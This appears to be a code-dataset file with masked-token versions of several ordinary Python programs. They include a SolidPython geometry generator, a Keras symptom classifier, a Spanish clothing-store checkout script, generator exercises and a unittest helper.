return shape_list
def export(shape, filename):
with open(filename + '.scad', 'w+') as f:
f.write(scad_render(shape, file_header='$fn = %s;' % SEGMENTS))
f.closed
print('Success')
<mask token>
| <mask token>
def voxels():
shape = []
for x in range(-5, 4, 1):
for y in range(-5, 4, 1):
for z in range(0, 10, 1):
translate([x, y, z])
new_cube = color([0, 0, 1, 0.5])(cube([1, 1, 1], center=False))
shape.append(new_cube)
return shape
def basic_geometry():
box_functions = [makeRectBeam, makeCubeBeam, makeTriangleBeam,
makeNothingBox, makeCylindBeam, makeHollowCylindBeam,
makeHollowCone, makeEye]
shape_list = []
for bf in box_functions:
for cf in box_functions:
for bf2 in box_functions:
for i in range(2):
shape = union()(bf(5, 4, 5), translate([0, 0, 5])(cf(4,
3, 5)), translate([0, 0, 10])(bf2(5, 4, 5)))
if i == 0:
shapeInner = cylinder(r=0.5, h=20, center=False)
shape = shape - shapeInner
shape_list.append(shape)
return shape_list
def export(shape, filename):
with open(filename + '.scad', 'w+') as f:
f.write(scad_render(shape, file_header='$fn = %s;' % SEGMENTS))
f.closed
print('Success')
if __name__ == '__main__':
out_dir = sys.argv[1] if len(sys.argv) > 1 else os.curdir
file_out = os.path.join(out_dir, 'basic_geometry.scad')
shape_list = basic_geometry()
for i, shape in enumerate(shape_list):
export(shape, 'output' + str(i))
print('Created OpenSCAD file...')
print('Compiling STL file...')
| from __future__ import division
import os
from solid import *
from solid.utils import *
from shapes import *
import sys
from solid import *
from solid.utils import *
def voxels():
shape = []
for x in range(-5, 4, 1):
for y in range(-5, 4, 1):
for z in range(0, 10, 1):
translate([x, y, z])
new_cube = color([0, 0, 1, 0.5])(cube([1, 1, 1], center=False))
shape.append(new_cube)
return shape
def basic_geometry():
box_functions = [makeRectBeam, makeCubeBeam, makeTriangleBeam,
makeNothingBox, makeCylindBeam, makeHollowCylindBeam,
makeHollowCone, makeEye]
shape_list = []
for bf in box_functions:
for cf in box_functions:
for bf2 in box_functions:
for i in range(2):
shape = union()(bf(5, 4, 5), translate([0, 0, 5])(cf(4,
3, 5)), translate([0, 0, 10])(bf2(5, 4, 5)))
if i == 0:
shapeInner = cylinder(r=0.5, h=20, center=False)
shape = shape - shapeInner
shape_list.append(shape)
return shape_list
def export(shape, filename):
with open(filename + '.scad', 'w+') as f:
f.write(scad_render(shape, file_header='$fn = %s;' % SEGMENTS))
f.closed
print('Success')
if __name__ == '__main__':
out_dir = sys.argv[1] if len(sys.argv) > 1 else os.curdir
file_out = os.path.join(out_dir, 'basic_geometry.scad')
shape_list = basic_geometry()
for i, shape in enumerate(shape_list):
export(shape, 'output' + str(i))
print('Created OpenSCAD file...')
print('Compiling STL file...')
| #! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division
import os
from solid import *
from solid.utils import *
from shapes import *
import sys
# Assumes SolidPython is in site-packages or elsewhwere in sys.path
from solid import *
from solid.utils import *
def voxels():
# shape = cube([1, 1, 1], center=False);
shape = []
for x in range(-5, 4, 1):
for y in range(-5, 4, 1):
for z in range(0, 10, 1):
translate([x, y, z])
new_cube = color([0,0,1, 0.5])(cube([1, 1, 1], center=False));
# shape = (shape+new_cube)
shape.append(new_cube)
return shape
def basic_geometry():
box_functions = [makeRectBeam, makeCubeBeam, makeTriangleBeam,makeNothingBox, makeCylindBeam, makeHollowCylindBeam, makeHollowCone, makeEye]
# cylind_functions = [makeCylindBeam, makeHollowCylindBeam, makeHollowCone, makeEye, makeNothingCylind]
shape_list = []
for bf in box_functions:
for cf in box_functions:
for bf2 in box_functions:
for i in range(2):
shape = union()(
# translate([-2, -3, 0])(
bf(5, 4, 5),
translate([0, 0, 5])(
cf(4, 3, 5)),
translate([0, 0, 10])(
bf2(5, 4, 5))
)
if i == 0:
shapeInner = cylinder(r=0.5, h=20, center=False)
shape = shape - shapeInner
shape_list.append(shape)
return shape_list
def export(shape, filename):
with open(filename + '.scad', 'w+') as f:
f.write(scad_render(shape, file_header='$fn = %s;' % SEGMENTS))
f.closed
print("Success")
if __name__ == '__main__':
out_dir = sys.argv[1] if len(sys.argv) > 1 else os.curdir
file_out = os.path.join(out_dir, 'basic_geometry.scad')
shape_list = basic_geometry()
for i, shape in enumerate(shape_list):
export(shape, "output" + str(i))
print("Created OpenSCAD file...")
print("Compiling STL file...") | [
2,
3,
4,
5,
6
] |
1,683 | 7282af4186a976296ac50840e9169b78a66e118b | <mask token>
| <mask token>
np.random.seed(1)
<mask token>
encoder.fit(Y)
<mask token>
model.add(Dense(5, input_dim=len(X[0])))
model.add(Dense(32, activation='relu'))
model.add(Dense(len(onehot_Y[0]), activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[
'accuracy'])
model.fit(X, onehot_Y, validation_split=0.33, epochs=1000)
<mask token>
print('Accuracy:', accuracy, '%')
| <mask token>
np.random.seed(1)
df, meta = pyreadstat.read_sav('RESIDIV_Vimala.sav', usecols=[
'Sympt_blødning', 'Sympt_smerter', 'Sympt_ascites', 'Sympt_fatigue',
'Lengde_sympt_dager', 'Lengde_sympt_uker', 'Lengde_sympt_mnd', 'kreftform']
)
dataset = df.drop('kreftform', axis=1)
X = dataset.values
Y = df['kreftform'].values
encoder = LabelEncoder()
encoder.fit(Y)
encoded_Y = encoder.transform(Y)
onehot_Y = np_utils.to_categorical(encoded_Y)
model = Sequential()
model.add(Dense(5, input_dim=len(X[0])))
model.add(Dense(32, activation='relu'))
model.add(Dense(len(onehot_Y[0]), activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[
'accuracy'])
model.fit(X, onehot_Y, validation_split=0.33, epochs=1000)
accuracy = '%.2f' % (model.evaluate(X, onehot_Y)[1] * 100)
print('Accuracy:', accuracy, '%')
| import pyreadstat
import matplotlib.pyplot as plt
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from keras.utils import np_utils
from sklearn.preprocessing import LabelEncoder
np.random.seed(1)
df, meta = pyreadstat.read_sav('RESIDIV_Vimala.sav', usecols=[
'Sympt_blødning', 'Sympt_smerter', 'Sympt_ascites', 'Sympt_fatigue',
'Lengde_sympt_dager', 'Lengde_sympt_uker', 'Lengde_sympt_mnd', 'kreftform']
)
dataset = df.drop('kreftform', axis=1)
X = dataset.values
Y = df['kreftform'].values
encoder = LabelEncoder()
encoder.fit(Y)
encoded_Y = encoder.transform(Y)
onehot_Y = np_utils.to_categorical(encoded_Y)
model = Sequential()
model.add(Dense(5, input_dim=len(X[0])))
model.add(Dense(32, activation='relu'))
model.add(Dense(len(onehot_Y[0]), activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[
'accuracy'])
model.fit(X, onehot_Y, validation_split=0.33, epochs=1000)
accuracy = '%.2f' % (model.evaluate(X, onehot_Y)[1] * 100)
print('Accuracy:', accuracy, '%')
| import pyreadstat
import matplotlib.pyplot as plt
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from keras.utils import np_utils
from sklearn.preprocessing import LabelEncoder
# Set random seed for reproducible results
np.random.seed(1)
# Read sav file and create a pandas dataframe and extract metadata
df, meta = pyreadstat.read_sav("RESIDIV_Vimala.sav", usecols=["Sympt_blødning", "Sympt_smerter", "Sympt_ascites", "Sympt_fatigue", "Lengde_sympt_dager", "Lengde_sympt_uker", "Lengde_sympt_mnd", "kreftform"])
dataset = df.drop("kreftform", axis=1)
# dataset[0] is Y (kreftform), dataset[1, 2, 3 and 4] is X
X = dataset.values
Y = df["kreftform"].values
# encode class values as integers
encoder = LabelEncoder()
encoder.fit(Y)
encoded_Y = encoder.transform(Y)
# convert integers to dummy variables (i.e. one-hot encoded)
onehot_Y = np_utils.to_categorical(encoded_Y)
model = Sequential()
model.add(Dense(5, input_dim=(len(X[0]))))
model.add(Dense(32, activation="relu"))
model.add(Dense(len(onehot_Y[0]), activation="softmax"))
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
model.fit(X, onehot_Y, validation_split=0.33, epochs=1000)
accuracy = "%.2f" % (model.evaluate(X, onehot_Y)[1]*100)
print("Accuracy:", accuracy, "%")
| [
0,
1,
2,
3,
4
] |
1,684 | 333d237dd4a203fcfde3668901d725f16fbc402e | <mask token>
| print('-' * 100)
print('BIENVENIDOS A TIENDA ELEGANCIA')
print('-' * 100)
<mask token>
print(prendaseleccionada1)
<mask token>
print('La prenda: ', tipoPrenda1, 'participa de del plan SuperPuntos? s/n')
<mask token>
if valor1 == 's':
v1 = 's'
valor1 = precio1
superPuntos = superPuntos + precio1
elif valor1 == 'n':
v1 = 'n'
valor1 = 0
<mask token>
print(prendaseleccionada2)
<mask token>
print('La prenda: ', tipoPrenda2, 'participa de del plan SuperPuntos? s/n')
<mask token>
if valor2 == 's':
v2 = 's'
valor2 = precio2
superPuntos = superPuntos + precio2
elif valor2 == 'n':
v2 = 'n'
valor2 = 0
<mask token>
print(prendaseleccionada3)
<mask token>
print('La prenda: ', tipoPrenda3, 'participa de del plan SuperPuntos? s/n')
<mask token>
if valor3 == 's':
v3 = 's'
valor3 = precio3
superPuntos = superPuntos + precio3
elif valor3 == 'n':
v3 = 'n'
valor3 = 0
if tipoPrenda1 == tipoPrenda2 == tipoPrenda3:
if precio1 < precio2 and precio1 < precio3:
precio1 = 0
elif precio2 < precio3:
precio2 = 0
else:
precio3 = 0
if tipoPrenda1 == tipoPrenda2 and tipoPrenda1 != tipoPrenda3:
if precio1 > precio2:
precio1 = precio1 / 2
else:
precio2 = precio2 / 2
if tipoPrenda1 == tipoPrenda3 and tipoPrenda1 != tipoPrenda2:
if precio1 > precio3:
precio1 = precio1 / 2
else:
precio3 = precio3 / 2
if tipoPrenda2 == tipoPrenda3 and tipoPrenda2 != tipoPrenda1:
if precio2 > precio3:
precio2 = precio2 / 2
else:
precio3 = precio3 / 2
<mask token>
if formaDePago == 1:
formaDePago = 'Contado (%10 de Descuento)'
montoAPagar = precioTotal / 100 * 90
elif formaDePago == 2:
cuotas = int(input('ingrese en cuantas cuotas desea pagar:'))
if cuotas <= 3:
formaDePago = 'Tarjeta (%2 de Recarga) cantidad de cuotas:', cuotas
montoAPagar = precioTotal / 100 * 102
elif cuotas > 3:
formaDePago = 'Tarjeta (%5 de Recarga) cantidad de cuotas:', cuotas
montoAPagar = precioTotal / 100 * 105
elif cuotas <= 0:
formaDePago = 'Contado (%10 de Descuento)'
montoAPagar = precioTotal / 100 * 90
if valor1 > 0 and valor2 > 0 and valor3 > 0:
superPuntos = superPuntos * 2
print('----------------------------------------------------')
print('Tienda Elegancia')
print('Tipo, Precio, SuperPuntos')
print(prendaseleccionada1, precioinicial1, v1)
print(prendaseleccionada2, precioinicial2, v2)
print(prendaseleccionada3, precioinicial3, v3)
print('Total sin promo: ', precioSinPromo)
print('Ahorro: ', ahorro)
print('Total Con Promo: ', precioTotal)
print('Forma de Pago: ', formaDePago)
print('Monto a Pagar: ', montoAPagar)
print('Usted obtiene: ', superPuntos, 'SuperPuntos')
print('----------------------------------------------------')
| print('-' * 100)
print('BIENVENIDOS A TIENDA ELEGANCIA')
print('-' * 100)
prendas = ('Remeras', 'Camisas', 'Pantalones', 'Faldas', 'Vestidos',
'Abrigos', 'Calzado')
precioSinPromo = 0
superPuntos = 0
tipoPrenda1 = int(input(
'Ingrese Codigo de la prenda seleccionada: 0=Remeras, 1=Camisas, 2=Pantalones, 3=Faldas, 4=Vestidos, 5=Abrigos, 6=Calzado: '
))
prendaseleccionada1 = prendas[tipoPrenda1]
print(prendaseleccionada1)
precio1 = float(input('Ingrese precio: $'))
precioinicial1 = precio1
precioSinPromo = precioSinPromo + precio1
print('La prenda: ', tipoPrenda1, 'participa de del plan SuperPuntos? s/n')
valor1 = input()
v1 = None
if valor1 == 's':
v1 = 's'
valor1 = precio1
superPuntos = superPuntos + precio1
elif valor1 == 'n':
v1 = 'n'
valor1 = 0
tipoPrenda2 = int(input(
'Ingrese Codigo de la prenda seleccionada: 0=Remeras, 1=Camisas, 2=Pantalones, 3=Faldas, 4=Vestidos, 5=Abrigos, 6=Calzado: '
))
prendaseleccionada2 = prendas[tipoPrenda2]
print(prendaseleccionada2)
precio2 = float(input('Ingrese precio: $'))
precioinicial2 = precio2
precioSinPromo = precioSinPromo + precio2
print('La prenda: ', tipoPrenda2, 'participa de del plan SuperPuntos? s/n')
valor2 = input()
v2 = None
if valor2 == 's':
v2 = 's'
valor2 = precio2
superPuntos = superPuntos + precio2
elif valor2 == 'n':
v2 = 'n'
valor2 = 0
tipoPrenda3 = int(input(
'Ingrese Codigo de la prenda seleccionada: 0=Remeras, 1=Camisas, 2=Pantalones, 3=Faldas, 4=Vestidos, 5=Abrigos, 6=Calzado: '
))
prendaseleccionada3 = prendas[tipoPrenda3]
print(prendaseleccionada3)
precio3 = float(input('Ingrese precio: $'))
precioinicial3 = precio3
precioSinPromo = precioSinPromo + precio3
print('La prenda: ', tipoPrenda3, 'participa de del plan SuperPuntos? s/n')
valor3 = input()
v3 = None
if valor3 == 's':
v3 = 's'
valor3 = precio3
superPuntos = superPuntos + precio3
elif valor3 == 'n':
v3 = 'n'
valor3 = 0
if tipoPrenda1 == tipoPrenda2 == tipoPrenda3:
if precio1 < precio2 and precio1 < precio3:
precio1 = 0
elif precio2 < precio3:
precio2 = 0
else:
precio3 = 0
if tipoPrenda1 == tipoPrenda2 and tipoPrenda1 != tipoPrenda3:
if precio1 > precio2:
precio1 = precio1 / 2
else:
precio2 = precio2 / 2
if tipoPrenda1 == tipoPrenda3 and tipoPrenda1 != tipoPrenda2:
if precio1 > precio3:
precio1 = precio1 / 2
else:
precio3 = precio3 / 2
if tipoPrenda2 == tipoPrenda3 and tipoPrenda2 != tipoPrenda1:
if precio2 > precio3:
precio2 = precio2 / 2
else:
precio3 = precio3 / 2
precioTotal = precio1 + precio2 + precio3
ahorro = precioSinPromo - precioTotal
formaDePago = int(input('Ingrese la forma de pago:/ 1=Contado/ 2=Tarjeta'))
montoAPagar = 0
if formaDePago == 1:
formaDePago = 'Contado (%10 de Descuento)'
montoAPagar = precioTotal / 100 * 90
elif formaDePago == 2:
cuotas = int(input('ingrese en cuantas cuotas desea pagar:'))
if cuotas <= 3:
formaDePago = 'Tarjeta (%2 de Recarga) cantidad de cuotas:', cuotas
montoAPagar = precioTotal / 100 * 102
elif cuotas > 3:
formaDePago = 'Tarjeta (%5 de Recarga) cantidad de cuotas:', cuotas
montoAPagar = precioTotal / 100 * 105
elif cuotas <= 0:
formaDePago = 'Contado (%10 de Descuento)'
montoAPagar = precioTotal / 100 * 90
if valor1 > 0 and valor2 > 0 and valor3 > 0:
superPuntos = superPuntos * 2
print('----------------------------------------------------')
print('Tienda Elegancia')
print('Tipo, Precio, SuperPuntos')
print(prendaseleccionada1, precioinicial1, v1)
print(prendaseleccionada2, precioinicial2, v2)
print(prendaseleccionada3, precioinicial3, v3)
print('Total sin promo: ', precioSinPromo)
print('Ahorro: ', ahorro)
print('Total Con Promo: ', precioTotal)
print('Forma de Pago: ', formaDePago)
print('Monto a Pagar: ', montoAPagar)
print('Usted obtiene: ', superPuntos, 'SuperPuntos')
print('----------------------------------------------------')
| print('-'*100)
print('BIENVENIDOS A TIENDA ELEGANCIA')
print('-'*100)
prendas = ('Remeras', 'Camisas', 'Pantalones', 'Faldas', 'Vestidos', 'Abrigos', 'Calzado')
precioSinPromo = 0
superPuntos = 0
#ARTICULO 1
tipoPrenda1 = int(input('Ingrese Codigo de la prenda seleccionada: 0=Remeras, 1=Camisas, 2=Pantalones, 3=Faldas, 4=Vestidos, 5=Abrigos, 6=Calzado: '))
prendaseleccionada1 = prendas[tipoPrenda1]
print(prendaseleccionada1)
precio1 = float(input('Ingrese precio: $'))
precioinicial1 = precio1
precioSinPromo = precioSinPromo + precio1
print("La prenda: ", tipoPrenda1,"participa de del plan SuperPuntos? s/n")
valor1 = input()
v1 = None
if(valor1 == "s"):
v1 = 's'
valor1 = precio1
superPuntos = superPuntos + precio1
else:
if(valor1 == "n"):
v1 = "n"
valor1 = 0
# ARTICULO 2
tipoPrenda2 = int(input('Ingrese Codigo de la prenda seleccionada: 0=Remeras, 1=Camisas, 2=Pantalones, 3=Faldas, 4=Vestidos, 5=Abrigos, 6=Calzado: '))
prendaseleccionada2 = prendas[tipoPrenda2]
print(prendaseleccionada2)
precio2 = float(input('Ingrese precio: $'))
precioinicial2 = precio2
precioSinPromo = precioSinPromo + precio2
print("La prenda: ", tipoPrenda2, "participa de del plan SuperPuntos? s/n")
valor2 = input()
v2 = None
if (valor2 == "s"):
v2 = "s"
valor2 = precio2
superPuntos = superPuntos + precio2
else:
if (valor2 == "n"):
v2 = "n"
valor2 = 0
# ARTICULO 3
tipoPrenda3 = int(input('Ingrese Codigo de la prenda seleccionada: 0=Remeras, 1=Camisas, 2=Pantalones, 3=Faldas, 4=Vestidos, 5=Abrigos, 6=Calzado: '))
prendaseleccionada3 = prendas[tipoPrenda3]
print(prendaseleccionada3)
precio3 = float(input('Ingrese precio: $'))
precioinicial3 = precio3
precioSinPromo = precioSinPromo + precio3
print("La prenda: ", tipoPrenda3, "participa de del plan SuperPuntos? s/n")
valor3 = input()
v3 = None
if (valor3 == "s"):
v3 = "s"
valor3 = precio3
superPuntos = superPuntos + precio3
else:
if (valor3 == "n"):
v3 = "n"
valor3 = 0
#PROMO 3X2
if tipoPrenda1 == tipoPrenda2 == tipoPrenda3:
if precio1 < precio2 and precio1 < precio3:
precio1 = 0
else:
if precio2 < precio3:
precio2 = 0
else:
precio3 = 0
#PROMO 50%
if tipoPrenda1 == tipoPrenda2 and tipoPrenda1 != tipoPrenda3:
if precio1 > precio2:
precio1 = precio1 / 2
else:
precio2 = precio2 / 2
if tipoPrenda1 == tipoPrenda3 and tipoPrenda1 != tipoPrenda2:
if precio1 > precio3:
precio1 = precio1 / 2
else:
precio3 = precio3 / 2
if tipoPrenda2 == tipoPrenda3 and tipoPrenda2 != tipoPrenda1:
if precio2 > precio3:
precio2 = precio2 / 2
else:
precio3 = precio3 / 2
precioTotal = precio1 + precio2 + precio3
ahorro = precioSinPromo - precioTotal
#FORMA DE PAGO
formaDePago = int(input("Ingrese la forma de pago:/ 1=Contado/ 2=Tarjeta"))
montoAPagar = 0
if formaDePago == 1:
formaDePago = "Contado (%10 de Descuento)"
montoAPagar=precioTotal/100*90
else:
if(formaDePago == 2):
cuotas=int(input("ingrese en cuantas cuotas desea pagar:"))
if(cuotas <= 3):
formaDePago="Tarjeta (%2 de Recarga) cantidad de cuotas:", cuotas
montoAPagar=precioTotal/100*102
else:
if(cuotas > 3):
formaDePago="Tarjeta (%5 de Recarga) cantidad de cuotas:", cuotas
montoAPagar=precioTotal/100*105
else:
if(cuotas <= 0):
formaDePago="Contado (%10 de Descuento)"
montoAPagar=precioTotal/100*90
if valor1 > 0 and valor2 > 0 and valor3 > 0:
superPuntos = superPuntos * 2
print("----------------------------------------------------")
print("Tienda Elegancia")
print("Tipo, Precio, SuperPuntos")
print(prendaseleccionada1 , precioinicial1, v1)
print(prendaseleccionada2 , precioinicial2 , v2)
print(prendaseleccionada3 , precioinicial3 , v3)
print("Total sin promo: ", precioSinPromo)
print("Ahorro: ", ahorro)
print("Total Con Promo: ", precioTotal)
print("Forma de Pago: ", formaDePago)
print("Monto a Pagar: ", montoAPagar)
print("Usted obtiene: ", superPuntos, "SuperPuntos")
print("----------------------------------------------------") | null | [
0,
1,
2,
3
] |
1,685 | 732886306d949c4059b08e1bc46de3ad95ba56cb | <mask token>
def gprimo(nmax):
for x in range(1, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
<mask token>
| <mask token>
def gprimo(nmax):
for x in range(1, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
<mask token>
def genBadaBoom(N):
if N > 0:
for i in range(1, N + 1):
if i % 3 == 0 and i % 5 == 0:
yield 'Bada Boom!!'
elif i % 3 == 0:
yield 'Bada'
elif i % 5 == 0:
yield 'Boom!!'
else:
yield i
<mask token>
| <mask token>
def gprimo(nmax):
for x in range(1, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
<mask token>
print(z)
<mask token>
def genBadaBoom(N):
if N > 0:
for i in range(1, N + 1):
if i % 3 == 0 and i % 5 == 0:
yield 'Bada Boom!!'
elif i % 3 == 0:
yield 'Bada'
elif i % 5 == 0:
yield 'Boom!!'
else:
yield i
<mask token>
print(z)
<mask token>
print(combinaciones)
print('El número de combinaciones es:', len(combinaciones))
<mask token>
print(combinacionesFedora)
print('Número de combinaciones que incluyen sombrero fedora:', len(
combinacionesFedora))
<mask token>
print(Y)
| <mask token>
def gprimo(nmax):
for x in range(1, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
a = gprimo(10)
z = [e for e in a]
print(z)
<mask token>
def genBadaBoom(N):
if N > 0:
for i in range(1, N + 1):
if i % 3 == 0 and i % 5 == 0:
yield 'Bada Boom!!'
elif i % 3 == 0:
yield 'Bada'
elif i % 5 == 0:
yield 'Boom!!'
else:
yield i
a = genBadaBoom(10)
z = [e for e in a]
print(z)
<mask token>
camisas = ['roja', 'negra', 'azul', 'morada', 'cafe']
pantalones = ['negro', 'azul', 'cafe obscuro', 'crema']
accesorios = ['cinturon', 'tirantes', 'lentes', 'fedora']
combinaciones = [(x, y, z) for y in camisas for x in pantalones for z in
accesorios]
print(combinaciones)
print('El número de combinaciones es:', len(combinaciones))
<mask token>
combinacionesFedora = [(x, y, z) for x, y, z in combinaciones if z == 'fedora']
print(combinacionesFedora)
print('Número de combinaciones que incluyen sombrero fedora:', len(
combinacionesFedora))
<mask token>
cancion = """There's a hole in my heart, in my life, in my way
And it's filled with regret and all I did, to push you away
If there's still a place in your life, in your heart for me
I would do anything, so don't ask me to leave
I've got a hole in my soul where you use to be
You're the thorn in my heart and you're killing me
I wish I could go back and do it all differently
I wish that I'd treated you differently
'Cause now there's a hole in my soul where you use to be"""
cancion = list(cancion)
frecuenciaPalab = [cancion.count(w.casefold()) for w in cancion]
letra = filter(lambda a: cancion.count(a) == min(frecuenciaPalab), cancion)
Y = list(letra)
Y = dict.fromkeys(Y).keys()
print(Y)
| """
Primos <generadores> 30 pts
Realice una generador que devuelva de todos lo numeros primos
existentes de 0 hasta n-1 que cumpla con el siguiente prototipo:
def gprimo(N):
pass
a = gprimo(10)
z = [e for e in a]
print(z)
# [2, 3 ,5 ,7 ]
"""
def gprimo(nmax):
for x in range(1,nmax):
for i in range(2,x):
if x % i != 0:
#i no es divisor de x, x puede ser primo
continue
else:
#i es divisor de x, x no es primo
break
else:
#El bucle ha terminado con normalidad, el número que estabamos comprobando es primo
yield x
a = gprimo(10)
z =[e for e in a]
print(z)
"""
Bada Boom!!! <generadores> 20 pts
Defina un generador que reciba un numero entero positivo mayor a 0 N,
dicho generador proporciona numero de 1 hasta N
con las siguientes condiciones:
1) si es multiplo de 3 coloque la cadena "Bada"
2) si es multiplo de 5 coloque la cadena "Boom!!"
3) si es multiplo de 3 y 5 coloque "Bada Boom!!"
def genBadaBoom(N):
pass
a = genBadaBoom(10)
z = [e for e in a]
print(z)
#[1,2,"Bada",4,"Boom","Bada",7,8,"Bada","Boom"]
"""
def genBadaBoom(N):
if N > 0:
for i in range(1,N+1):
if(i % 3 == 0 and i % 5 == 0):
yield "Bada Boom!!"
elif(i % 3 == 0):
yield "Bada"
elif(i % 5 == 0):
yield "Boom!!"
else:
yield i
a = genBadaBoom(10)
z = [e for e in a]
print(z)
"""
Combinaciones <Comprensión de listas> 30pts
Una tienda de ropa quiere saber cuantos conjuntos se pueden crear
a partir de un grupo de 5 camisas (roja,negra,azul,morada y cafe),
4 pantalones (negro, azul, cafe obscuro y crema) y uno de 4 accesorios
posibles (cinturon, tirantes, lentes, fedora)
1) Obtenga una lista con todos los conjuntos posibles e imprimala en pantalla
2) imprima un mensaje donde mencione la cantidad de conjuntos posibles
"""
camisas = ["roja","negra","azul","morada","cafe"]
pantalones = ["negro", "azul", "cafe obscuro", "crema"]
accesorios = ["cinturon", "tirantes", "lentes", "fedora"]
combinaciones = [(x, y, z) for y in camisas for x in pantalones for z in accesorios]
print(combinaciones)
print("El número de combinaciones es:",len(combinaciones))
"""
¿Fedora? <Comprensión de listas > 15 pts
Del problema anterior imprima una lista que tenga todos los conjuntos
que incluyen un sombrero fedora y tambien despliegue su longitud
"""
combinacionesFedora = [(x, y, z) for (x,y,z) in combinaciones if z == 'fedora']
print(combinacionesFedora)
print("Número de combinaciones que incluyen sombrero fedora:",len(combinacionesFedora))
"""
<Monads> 30 pts
--Lacrimosa - Durch Nacht und Flut --
Die Suche endet jetzt und hier
Gestein kalt und nass
Granit in Deiner Brust
Der Stein der Dich zerdrückt
Der Fels der Dich umgibt
Aus dem gehauen Du doch bist
Despiertate te busco
Mi corazon abreté te libro
Elevate mi luz y prende mi llama
Si a ti, yo se, te encontrare
El fragmento anterior es un canción del duo lacrimosa
Usando Monads obtenga la letra
que menos se repite por cada linea y obtenga la probabilidad de sacar dicha
letra.
Nota: Pueden ayudarse de funciones recursivas y compresiones de lista.
"""
"""
<Monads>
--Hole in my soul apocalyptica-- 20 pts
El fragmento anterior es un canción del grupo apocalyptica
Usando Monads obtenga la letra
que menos se repite de todo el fragmento y obtenga la probabilidad de sacar dicha
letra.
Nota: Pueden ayudarse de funciones recursivas y compresiones de lista.
"""
cancion = """There's a hole in my heart, in my life, in my way
And it's filled with regret and all I did, to push you away
If there's still a place in your life, in your heart for me
I would do anything, so don't ask me to leave
I've got a hole in my soul where you use to be
You're the thorn in my heart and you're killing me
I wish I could go back and do it all differently
I wish that I'd treated you differently
'Cause now there's a hole in my soul where you use to be"""
cancion = list(cancion)#Lo hacemos una lista
frecuenciaPalab = [cancion.count(w.casefold()) for w in cancion] #contamos la frecuencia de cada letra sin importarnos si la letra se repite
letra = filter(lambda a: cancion.count(a) == min(frecuenciaPalab),cancion) #aplicamos un filtro a esa lista que nos devuela las letras que coinciden con el numero minimo en la frecuencia de letras que ya habiamos calculado
Y = list(letra)#Lo hacemos lista
Y = dict.fromkeys(Y).keys()#Para evitar valores duplicados que en un diccionario no se pueden duplicar los valores
print(Y)
| [
1,
2,
3,
4,
5
] |
1,686 | e9c88e18472281438783d29648c673aa08366abb | <mask token>
class GpTestCase(unittest.TestCase):
def __init__(self, methodName='runTest'):
super(GpTestCase, self).__init__(methodName)
self.patches = []
self.mock_objs = []
def apply_patches(self, patches):
if self.patches:
raise Exception('Test class is already patched!')
self.patches = patches
self.mock_objs = [p.start() for p in self.patches]
def tearDown(self):
[p.stop() for p in self.patches]
self.mock_objs = []
<mask token>
| <mask token>
class GpTestCase(unittest.TestCase):
def __init__(self, methodName='runTest'):
super(GpTestCase, self).__init__(methodName)
self.patches = []
self.mock_objs = []
def apply_patches(self, patches):
if self.patches:
raise Exception('Test class is already patched!')
self.patches = patches
self.mock_objs = [p.start() for p in self.patches]
def tearDown(self):
[p.stop() for p in self.patches]
self.mock_objs = []
def add_setup(setup=None, teardown=None):
"""decorate test functions to add additional setup/teardown contexts"""
def decorate_function(test):
def wrapper(self):
if setup:
setup(self)
test(self)
if teardown:
teardown(self)
return wrapper
return decorate_function
def run_tests():
unittest.main(verbosity=2, buffer=True)
<mask token>
| <mask token>
class GpTestCase(unittest.TestCase):
def __init__(self, methodName='runTest'):
super(GpTestCase, self).__init__(methodName)
self.patches = []
self.mock_objs = []
def apply_patches(self, patches):
if self.patches:
raise Exception('Test class is already patched!')
self.patches = patches
self.mock_objs = [p.start() for p in self.patches]
def tearDown(self):
[p.stop() for p in self.patches]
self.mock_objs = []
def add_setup(setup=None, teardown=None):
"""decorate test functions to add additional setup/teardown contexts"""
def decorate_function(test):
def wrapper(self):
if setup:
setup(self)
test(self)
if teardown:
teardown(self)
return wrapper
return decorate_function
def run_tests():
unittest.main(verbosity=2, buffer=True)
skip = unittest.skip
| import unittest2 as unittest
class GpTestCase(unittest.TestCase):
def __init__(self, methodName='runTest'):
super(GpTestCase, self).__init__(methodName)
self.patches = []
self.mock_objs = []
def apply_patches(self, patches):
if self.patches:
raise Exception('Test class is already patched!')
self.patches = patches
self.mock_objs = [p.start() for p in self.patches]
def tearDown(self):
[p.stop() for p in self.patches]
self.mock_objs = []
def add_setup(setup=None, teardown=None):
"""decorate test functions to add additional setup/teardown contexts"""
def decorate_function(test):
def wrapper(self):
if setup:
setup(self)
test(self)
if teardown:
teardown(self)
return wrapper
return decorate_function
def run_tests():
unittest.main(verbosity=2, buffer=True)
skip = unittest.skip
| import unittest2 as unittest
class GpTestCase(unittest.TestCase):
def __init__(self, methodName='runTest'):
super(GpTestCase, self).__init__(methodName)
self.patches = []
self.mock_objs = []
def apply_patches(self, patches):
if self.patches:
raise Exception('Test class is already patched!')
self.patches = patches
self.mock_objs = [p.start() for p in self.patches]
# if you have a tearDown() in your test class,
# be sure to call this using super.tearDown()
def tearDown(self):
[p.stop() for p in self.patches]
self.mock_objs = []
def add_setup(setup=None, teardown=None):
"""decorate test functions to add additional setup/teardown contexts"""
def decorate_function(test):
def wrapper(self):
if setup:
setup(self)
test(self)
if teardown:
teardown(self)
return wrapper
return decorate_function
# hide unittest dependencies here
def run_tests():
unittest.main(verbosity=2, buffer=True)
skip = unittest.skip
| [
4,
6,
7,
8,
9
] |
1,687 | 1b7048ef17b3512b9944ce7e197db27f4fd1aed0 | <mask token>
| <mask token>
f.write(
